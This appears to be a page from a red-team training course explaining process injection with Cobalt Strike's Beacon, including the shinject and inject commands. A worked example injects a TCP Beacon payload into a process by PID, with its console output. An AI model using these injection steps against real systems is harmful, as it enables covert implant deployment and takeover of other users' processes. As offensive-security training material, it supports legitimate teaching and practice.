Process Injection

Process injection allows us to inject arbitrary shellcode into a process of our choosing. You can only inject into processes that you can obtain a handle to with enough privileges to write into its memory. In a non-elevated context, which usually limits you to your own processes. In an elevated context, this includes processes owned by other users.

Beacon has two main injection commands - shinject and inject. shinject allows you to inject any arbitrary shellcode from a binary file on your attacking machine; and inject will inject a full Beacon payload for the specified listener.

If we wanted to inject a TCP Beacon payload into the MMC process mentioned in the previous module, we could do:

beacon> inject 4464 x64 tcp-local
[*] Tasked beacon to inject windows/beacon_bind_tcp (127.0.0.1:4444) into 4464 (x64)
[+] established link to child beacon: 10.10.123.102

Where:

4464 is the target PID.
x64 is the architecture of the process.
tcp-local is the listener name.

The command will also automatically attempt to connect to the child if a P2P listener is used. The resulting Beacon will run with the full privilege of the user who owns the process.

The same caveats also apply - if the user closes this process, the Beacon will be lost. The shellcode that's injected uses the Exit Thread function, so it won't kill the process if we exit the Beacon.

PreviousMake Token NextLateral Movement

Last updated 1 year ago